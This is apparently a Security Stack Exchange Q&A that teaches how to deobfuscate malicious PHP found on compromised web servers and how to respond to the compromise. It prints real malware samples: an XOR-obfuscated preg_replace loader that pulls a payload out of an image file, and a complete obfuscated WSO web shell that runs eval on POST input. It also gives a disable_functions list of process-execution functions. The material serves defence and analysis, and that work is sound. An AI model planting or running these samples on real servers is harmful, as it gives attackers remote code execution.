163

We've been getting a lot of noise regarding hacked PHP files here, and it's taking a lot of time to answer these questions. In many cases, they are off-topic. We've had a discussion about this on Information Security Meta, and many people want these posts to stay.

However, nearly every single post about obfuscated PHP can be answered in almost the same way. I think we can condense the majority of the methods for de-obfuscating hacked files into one single question & answer thread.

This leads to the question many people are asking: how do I de-obfuscate malicious PHP code that I found on my server, how did it happen, and what do I do?!

Mark Buffalo
  • 22,508
  • 8
  • 74
  • 91

2 Answers2

185

Fortunately, almost all PHP scripts can be deobfuscated with 4 simple methods. We're going to use these four methods to create a canonical answer.

Before we begin, let's collect a list of common tools that assist in deobfuscating these malicious files so we can do the work ourselves.


Common tools that aid in deobfuscation

  1. UnPHP. This greatly aids in de-obfuscating scripts that have nested obfuscation in excess of 100 nested functions. In many cases, this website, and those like it, should be the first one for you to visit. However, in some cases, UnPHP cannot deobfuscate the initial payload. In those cases, other tools we'll list will suffice.
  2. PHP Beautifier. This is an excellent tool for splitting up single-line files which are otherwise very difficult to read.
  3. Base64 decoders. I'm linking to Google search for this one. Some of these Base64 websites look kind of shady, so if you prefer to use an offline version without visiting those websites, I whipped up a quick tool for Windows (get Base64Decode.exe). Source code is available as well.
  4. PHP Sandbox. You can also look for other sandboxes on google. We'll use this to run echo commands when needed.

Commonly exploited PHP functions

The vast majority of hacks are using some form of eval, or preg_place, or both:

  1. eval(). This can be an evil function, as it allows arbitrary execution of PHP code. Just finding this function in use on your website could be an indication that you've been hacked.
  2. preg_replace(). Frequently used with eval() to allow for arbitrary code execution. There are plenty of good uses for preg_replace(), but if you don't know how it got there, and especially if it appears alongside obfuscated code, that's a clear indication that you've been hacked.
  3. Additional Information. To prevent this answer from becoming too large, I'm going to link to this question about commonly-exploited PHP functions.
  4. Also, check out the OWASP PHP Cheat Sheet.

While base64_decode is used in nearly all of the hacks we've come across, it mainly serves as a layer of obfuscation.


Common obsfuscation formats

There are several different ways that hackers obfuscate their code. Let's list some of the common techniques so we know how to spot them and then decode them:

  1. Hex Encoding. You'll be looking for the HEX number on that table list. In PHP, these can be represented by backslash x, followed by a number or letter. Examples:
  • \x48 = H
  • \x34 = 4
  • \x78 = x

However, they aren't necessarily represented only by \x. They could be \# as well. 2. Unicode strings. Almost the same as above, but \u# instead of \x#. Examples:

  • \u004D = M
  • \u0065 = e
  • \u0020 = (space)
  • \u0070 = p
  • \u006c = l
  • \u0073\ = s
  1. Base64 encoding. Base64 is a bit different than the aforementioned methods of obfuscation, but is still relatively easy to decode. Example strings:
  • SSBsaWtlIGRvbnV0cw== = I like donuts
  • ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));
  • QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control
  1. Garbage stored in a string, split by for loops, regex, etc. You'll have to decode that yourself, as they vary considerably. Fortunately, many of the aforementioned methods should assist you in de-obfuscating this time.

How can I deobfuscate PHP Files by myself?

Because we cannot help (we can, I can, but they won't let me! :P) with every single PHP malware snippet out there, it would be better to teach you how to do it.

Learning how to do this yourself will help you learn more about PHP, and more about what's going on. Let's put our tools to use, and use two previous examples of PHP deobfuscation on this website.


Deobfuscation Example #1

Refer to this question. Copy and paste the code into UnPHP:

<?php preg_replace("\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40","\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77","\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41"); ?>

And you'll see it doesn't deobfuscate it for us. Bummer. We're going to have to do some extra work. Note the strings, along with it's concatenations. Argh! It's so ugly and confusing! What are we going to do with these strings? This is where the PHP sandbox comes into play.

<?php
    echo "\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40" . "<br/>"; 
    echo "\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77" . "<br/>";
    echo "\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41" . "<br/>";
?>

Now that we've echo'd the contents, we can rebuild it to get the following results:

<?php 
    preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));",
    "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; 
?>

Note the string, L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc? That looks an awful lot like the Base64 encoding we talked about earlier! Let's try to decode it and see if we're right:

/home4/mitzvahc/public_html/assets/img/logo_small.png

After opening the logo_small.png file in some kind of text editor, we find something like this:

eval(gzuncompress(base64_decode("evil_payload")));

Oh no!!!

If you run the file contents through UnPHP, you should get your decoded results.


Deobfuscation Example #2

Refer to this question:

Remember earlier when we mentioned ASCII encoding? Take a look at the code:

<?php 
    ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit;
?>

Let's copy and paste this into UnPHP. Once the results are in, we can finally see what it's doing, but it looks all smashed together. Let's paste it into the PHP Beautifier. Now it's a lot easier to read!


Deobfuscating variable names

If you're not able to deobfuscate variable names through any of the previously-mentioned methods, then deobfuscating those variable names can be a manual, time-consuming process. Fortunately, looking for common malware patterns such as shutting off the log files, using eval() or preg_replace() with obfuscation indicates that something is wrong.

Obfuscation is the wrong approach, so if you find code obfuscated on your website, you should assume you've been hacked. You should not be obfuscating your code. Security at the expense of usability is not security.


Deobfuscation Risks

Trying to decode these files on your own web server is not safe for a lot of reasons, some of which may be unknown to us. Do not try to deobfuscate PHP files on your own web server. You could inadvertently introduce additional backdoors, or assist the malware in spreading itself because many of the scripts load functions remotely.


That's nice, but how did I get hacked?

This is really too broad to answer without us having access to everything on your web server, including logs.

You may have incorrect hardening on your Content Management System (CMS) installation, or there may be a vulnerability somewhere in your web stack. You can check these links if they're part of your CMS:

  1. Joomla Security Checklist
  2. WordPress Hardening
  3. Drupal Security Checklist

If your CMS isn't listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it's on you to fix your security holes. The OWASP Cheat Sheet serves as a good starting point to finding and fixing common vulnerabilities. Remember, only you can prevent shell access.

There could be any number of reasons why this is happening... but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website... meanwhile, they are attacking your visitors.


So what do I do?!

You should read this Q&A: How do I deal with a compromised server?

Mark Buffalo
  • 22,508
  • 8
  • 74
  • 91
  • I'm intrigued by the idea that `\u004D` and friends aren't hex codes. Does the bold-shouty "**HEX**" have some specific meaning that I'm not aware of? –  Feb 23 '16 at 15:01
  • 1
    @WumpusQ.Wumbley My bad. I was trying to show that you aren't looking for the hex code column in the table, like on the first website. It's purely a cosmetic thing. Fixed. – Mark Buffalo Feb 23 '16 at 15:03
  • 2
    A new and interesting variant that seems to have come about of late is to take a string like $nm3 = "dba4ce6_ospt" and then use substring matching to reconstruct the function name like "${$nm3[1].$nm3[2].$nm3[9]...}()" ... since the string can be in any order it's a real pain to grep for. – Kaithar Feb 24 '16 at 16:12
  • @Kaithar Yeah, I've covered that in `Common obsfuscation formats: #4`. Definitely annoying. – Mark Buffalo Feb 24 '16 at 16:16
  • @MarkBuffalo Ah, I'd interpreted that more as the exec'd code being stored that way rather than base64_decode call itself being hidden that way. Fair point though. – Kaithar Feb 24 '16 at 17:56
  • On the section "Commonly exploited PHP functions", you should add the [`curl_*` family](http://php.net/manual/en/book.curl.php), which is really used too. On "Common obsfuscation formats", you should add `XORing` of strings (E.g.: `'A' ^ 'b' == ''`). – Ismael Miguel Feb 25 '16 at 13:56
  • @IsmaelMiguel Make the edit, or make your own answer. The XORing can usually be defeated by echoing the XOR'd strings. There's an example of echoing a XOR'd string above. – Mark Buffalo Feb 25 '16 at 13:59
27

Mark's excellent answer deals with the case where the obfuscation is relatively straightforward. This addresses 99% of cases, but once in a while you may come across something a bit more malicious, e.g. using encryption of the source code too. Executing the code (or at least part of it) can be a much quicker way to find out what the code is doing than reverse engineering the source by hand - but can be extremely dangerous! There are some things you can do to contain / limit the damage.

Always use a vm See also this question.

Disable functions PHP.ini has a disable_functions option which allows you to selectively block access to particular bits of functionality. Mark has already mentioned eval and preg_replace() (the latter is removed in PHP 7) but the process execution functions also provide a useful leverage point:

  disable_functions=eval,preg_replace,exec,passthru,shell_exec\
    ,system,proc_open,popen,imap_open,pcntl_exec,pcntl_fork

Use the Runkit extension This allows you to redefine functions, including PHP's builtin ones. Note that the runkit sandbox is not intended to provide much isolation - it does allow you to programmatically interact with PHP code running in a different thread / environment.

symcbean
  • 18,418
  • 40
  • 74
  • I think it is eval() that was removed from PHP7, preg_replace() is still there: http://php.net/manual/en/function.preg-replace.php – mastazi Feb 23 '16 at 12:51
  • 4
    The 'e' regex modifier is removed in 7 - http://php.net/manual/en/reference.pcre.pattern.modifiers.php I believe that eval is still present (its a useful construct handled correctly) – symcbean Feb 23 '16 at 13:01
  • 2
    @mastazi Yes, but they [removed](https://secure.php.net/manual/en/function.preg-replace.php#refsect1-function.preg-replace-changelog) the `e` _(eval)_ modifier. – user2428118 Feb 23 '16 at 13:02
  • 1
    VMs are great, though for the truly paranoid you may want an airgapped machine. And if one is really interested, you could probably create a little dockerized network and use that to grok exactly what steps are happening, if the attack is more advanced anyway. – Wayne Werner Feb 24 '16 at 15:00
  • 1
    eval is language construct, not a function, thus cannot be disabled with `disable_functions` – Miloš Đakonović Jul 30 '19 at 09:11